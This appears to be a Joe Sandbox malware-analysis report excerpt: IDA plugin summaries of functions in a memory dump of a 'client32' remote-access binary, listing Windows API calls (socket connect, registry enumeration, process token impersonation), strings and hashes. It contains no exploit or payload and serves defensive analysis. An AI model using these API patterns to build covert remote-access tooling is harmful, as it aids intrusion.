Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$DebugOutputString$CriticalEnterExceptionException@8RaiseSectionThrow_memmoveconnectgethostbynamehtonssocket
String ID: Connect() the socket is not closed
API String ID: 2474459257-1125742345
Opcode ID: 54d8e7b5892c30b6b4f810c86b54dda1ad162664b9ce774bebfbd9c0da97a28c
Instruction ID: 21546ceb70cc741e7903571da763b1082d067e34ad2480fef3622f7f36bd6aac
Opcode Fuzzy Hash: 54d8e7b5892c30b6b4f810c86b54dda1ad162664b9ce774bebfbd9c0da97a28c
Instruction Fuzzy Hash: CD418375D00719AFCB14DFA4C840B9EF7B8FF48724F10461AE56AA7684EB70BA04CB94

Uniqueness

Uniqueness Score: -1.00%

Function 11153730 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 11153763
CreateCompatibleDC.GDI32(00000000), ref: 11153779
SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
SelectObject.GDI32(00000000,00000000), ref: 1115389B
SelectObject.GDI32(00000000,?), ref: 111538C1
SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
DeleteDC.GDI32(00000000), ref: 111538D8
ReleaseDC.USER32 ref: 111538E7

Strings

(, xrefs: 111537D7

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
String ID: (
API String ID: 602542589-3887548279
Opcode ID: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
Instruction ID: d520eb4ea94c146294e5bc27ee2bf9e491812ef3a8de5d3ff178baa6803be84b
Opcode Fuzzy Hash: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
Instruction Fuzzy Hash: 1751FAF5E102289FDB64DF29CD84799BBB8EF89304F4051E9E619E3240E6705E81CF68

Uniqueness

Uniqueness Score: -1.00%

Function 110654E0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

GetOEMCP.KERNEL32(View,Cachesize,00000400,00000000,77D59EB0,00000000), ref: 11065525

Part of subcall function 11064880: _strtok.LIBCMT ref: 110648C0
Part of subcall function 11064880: _strtok.LIBCMT ref: 110648F0

GetDC.USER32(00000000), ref: 11065558
GetDeviceCaps.GDI32(00000000,0000000E), ref: 11065563
GetDeviceCaps.GDI32(00000000,0000000C), ref: 1106556E
ReleaseDC.USER32 ref: 110655B9

Strings

932, 949, 1361, 874, 862, xrefs: 1106552B
Codepage, xrefs: 11065530
View, xrefs: 1106550A
Cachesize, xrefs: 11065505
DBCS, xrefs: 11065535

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CapsDevice_strtok$Release__wcstoi64
String ID: 932, 949, 1361, 874, 862$Cachesize$Codepage$DBCS$View
API String ID: 3945178471-2526036698
Opcode ID: 7d261fcda4c949a0c3ddb18fad86a02fd73410cea06ba131c8d8cda619c85b53
Instruction ID: 682317bc02e2a30c69588dc0a9c96f0ce4cbb9861371b6ad8b8e837dbdf19ace
Opcode Fuzzy Hash: 7d261fcda4c949a0c3ddb18fad86a02fd73410cea06ba131c8d8cda619c85b53
Instruction Fuzzy Hash: DA21497AE002246BE3149F75CDC4BA9FB98FB08354F014565F969EB280D775A940C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 11061320 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,0CBC1010,00000000,?,00000000), ref: 110613A4
_malloc.LIBCMT ref: 110613EB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,0CBC1010,00000000), ref: 1106142B
RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
_free.LIBCMT ref: 110614A4

Strings

err == 0, xrefs: 110613B8
strlen (k.m_k) < _tsizeof (m_szSectionAndKey), xrefs: 110615AA
maxname < _tsizeof (m_szSectionAndKey), xrefs: 110613D8
..\ctl32\Config.cpp, xrefs: 110613B3, 110613D3, 110615A5

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
API String ID: 999355418-161875503
Opcode ID: 366c4e240644d7494d644cc50a0681e050061cd55405cda789dc01ec1de77fff
Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
Opcode Fuzzy Hash: 366c4e240644d7494d644cc50a0681e050061cd55405cda789dc01ec1de77fff
Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 11016766 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 142windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

GetDlgItem.USER32 ref: 110167D3
SendMessageA.USER32(?,00001037,00000000,00000000), ref: 11016826
SendMessageA.USER32(?,00001036,00000000,00000000), ref: 11016839
LoadLibraryA.KERNEL32(User32.dll), ref: 1101687B
EnumWindows.USER32(Function_00016500,?), ref: 110168CF
FreeLibrary.KERNEL32(?), ref: 110168E3
FreeLibrary.KERNEL32(?), ref: 110168F0

Strings

explorer, xrefs: 1101684D
User32.dll, xrefs: 11016876

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$FreeMessageSend$EnumItemLoadWindows_malloc_memsetwsprintf
String ID: User32.dll$explorer
API String ID: 4080383323-2144398479
Opcode ID: 0b759dcca7f1fee2c9cbd4a3fecaf29e60719aa470de351b8ccb570e0ddf620d
Instruction ID: 5c98bee146702e2cd439898128a11489aac44479a45911a971654e339293b8be
Opcode Fuzzy Hash: 0b759dcca7f1fee2c9cbd4a3fecaf29e60719aa470de351b8ccb570e0ddf620d
Instruction Fuzzy Hash: BA5128B4E007089FDB14CFA9CC84A9EFBF9BF88704F10465AE515AB3A4D7B5A941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 110042C0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 11001F80: FindWindowA.USER32 ref: 11001FA9
Part of subcall function 11001F80: GetWindowThreadProcessId.USER32(00000000,?), ref: 11001FB7
Part of subcall function 11001F80: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11001FCB
Part of subcall function 11001F80: GetVersionExA.KERNEL32(?), ref: 11001FE4
Part of subcall function 11001F80: OpenProcessToken.ADVAPI32(00000000,0002000B,00000000), ref: 11002000
Part of subcall function 11001F80: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 11002011
Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 11002028
Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 1100202F

_memset.LIBCMT ref: 11004313

Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB

EnableWindow.USER32(00000000,00000000), ref: 110043C6
GetSaveFileNameA.COMDLG32(00000058), ref: 110043CF
EnableWindow.USER32(00000000,00000001), ref: 11004453
RevertToSelf.ADVAPI32 ref: 11004455

Strings

m_hWnd, xrefs: 110043AD, 11004440
X, xrefs: 1100431B
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110043A8, 1100443B
BMP, xrefs: 11004397

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Process$CloseEnableFileFolderHandleNameOpenPath$FindImpersonateLoggedModuleRevertSaveSelfThreadTokenUserVersion_memset
String ID: BMP$X$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3949878547-2539113696
Opcode ID: 48da74a7928ca4822a4385de0e35a74d1a49f96b10f86b19444b1993e94a909d
Instruction ID: 1a06fff4f71d161ae854b0cf7e53d0be396d8369705791c075994b803ddd0564
Opcode Fuzzy Hash: 48da74a7928ca4822a4385de0e35a74d1a49f96b10f86b19444b1993e94a909d
Instruction Fuzzy Hash: E441B3B4E003199BEB21DF60CC41FDAB7F4EB08748F0145A9E519AB280DBB5AA44CF54

Uniqueness

Uniqueness Score: -1.00%

Function 11028450 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 83synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,775EC740), ref: 11145CA0
Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA

_memset.LIBCMT ref: 11028485

Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB

wsprintfA.USER32 ref: 110284BA
WaitForSingleObject.KERNEL32(?,000000FF), ref: 110284FF
GetExitCodeProcess.KERNEL32 ref: 11028513
CloseHandle.KERNEL32(?,00000000), ref: 11028545
CloseHandle.KERNEL32(?), ref: 1102854E

Strings

D, xrefs: 1102848D
%sIsMetro.exe, xrefs: 110284B4
metro=%d, xrefs: 11028524

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseFolderHandlePath_memset$CodeExitFileModuleNameObjectOpenProcessSingleVersionWait_strncpywsprintf
String ID: %sIsMetro.exe$D$metro=%d
API String ID: 3392034305-515928727
Opcode ID: 26f18ffd8f982b8077e350d85f181193653178b5fb6154d62ed9878bd0b9a749
Instruction ID: 4035e3a62bf36e169ef3c879669cea6ce37e88d9ef90ad3d85adb6442f5f9602
Opcode Fuzzy Hash: 26f18ffd8f982b8077e350d85f181193653178b5fb6154d62ed9878bd0b9a749
Instruction Fuzzy Hash: 3D215375A4022CABDB14DBA4CC85FEBB778EF85704F4045D8E518A7644DAB1AE84CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 11002620 Relevance: 15.2, APIs: 10, Instructions: 155COMMON

Download Yara Rule

APIs

SetROP2.GDI32(?,00000007), ref: 11002631
SelectObject.GDI32(?,?), ref: 11002642
MoveToEx.GDI32(?,?,?,00000000), ref: 110026AF
LineTo.GDI32(?,00000000,?), ref: 110026E6
MoveToEx.GDI32(?,?,?,00000000), ref: 110027A9
LineTo.GDI32(?,?,?), ref: 110027B8
LineTo.GDI32(?,?,?), ref: 110027C3
LineTo.GDI32(?,?,?), ref: 110027CE
SelectObject.GDI32(?,?), ref: 110027D5
SetROP2.GDI32(?,?), ref: 110027E0

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Line$MoveObjectSelect
String ID:
API String ID: 3849273610-0
Opcode ID: c53529f1dc4d7278c1e2bdfbc1d09de2f48358c96fcb55bf2390c852d8790959
Instruction ID: 60fc3701a2ff4533ab105798ae09397bcf1b6d79f9a4234bdec1028ad67aa090
Opcode Fuzzy Hash: c53529f1dc4d7278c1e2bdfbc1d09de2f48358c96fcb55bf2390c852d8790959
Instruction Fuzzy Hash: 23518E7590061EEFCB049FA5D9848AEFBBCFF48318F018459E96973254CB30A961CF60

Uniqueness

Uniqueness Score: -1.00%

Function 111224E0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 245COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 11122519

Strings

NC_FULLSCREEN, xrefs: 11122706
s, xrefs: 11122791
IgnoreAudioErr, xrefs: 11122751
_debug, xrefs: 11122756
Replay, xrefs: 111227B1
ReplayAudio, xrefs: 111227AC

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: IgnoreAudioErr$NC_FULLSCREEN$Replay$ReplayAudio$_debug$s
API String ID: 536389180-1796175098
Opcode ID: 27afa7fbe1bc4af3ccb1df705c0f5424e64d1546a97ab4e80f6d6db3ac2a8b36
Instruction ID: cb2900c279777de7545e560f999f6a77f6d793e64e0f37265b5f9b430f180949
Opcode Fuzzy Hash: 27afa7fbe1bc4af3ccb1df705c0f5424e64d1546a97ab4e80f6d6db3ac2a8b36
Instruction Fuzzy Hash: 8B91D539A046169BCB10CF64CC80BDEF7B5EF55318FA44169E809AF245DB74AD41CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 11019350 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11019370

Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4

_memmove.LIBCMT ref: 110193F7
_memmove.LIBCMT ref: 1101941B
_memmove.LIBCMT ref: 11019455
_memmove.LIBCMT ref: 11019471
std::exception::exception.LIBCMT ref: 110194BB
__CxxThrowException@8.LIBCMT ref: 110194D0

Strings

deque<T> too long, xrefs: 1101936B

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
Opcode Fuzzy Hash: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790

Uniqueness

Uniqueness Score: -1.00%

Function 111194B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 111194E1
MapWindowPoints.USER32 ref: 111194FA
GetClientRect.USER32 ref: 11119508
GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
GetSystemMetrics.USER32 ref: 11119559
GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
GetSystemMetrics.USER32 ref: 11119576

Strings

GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
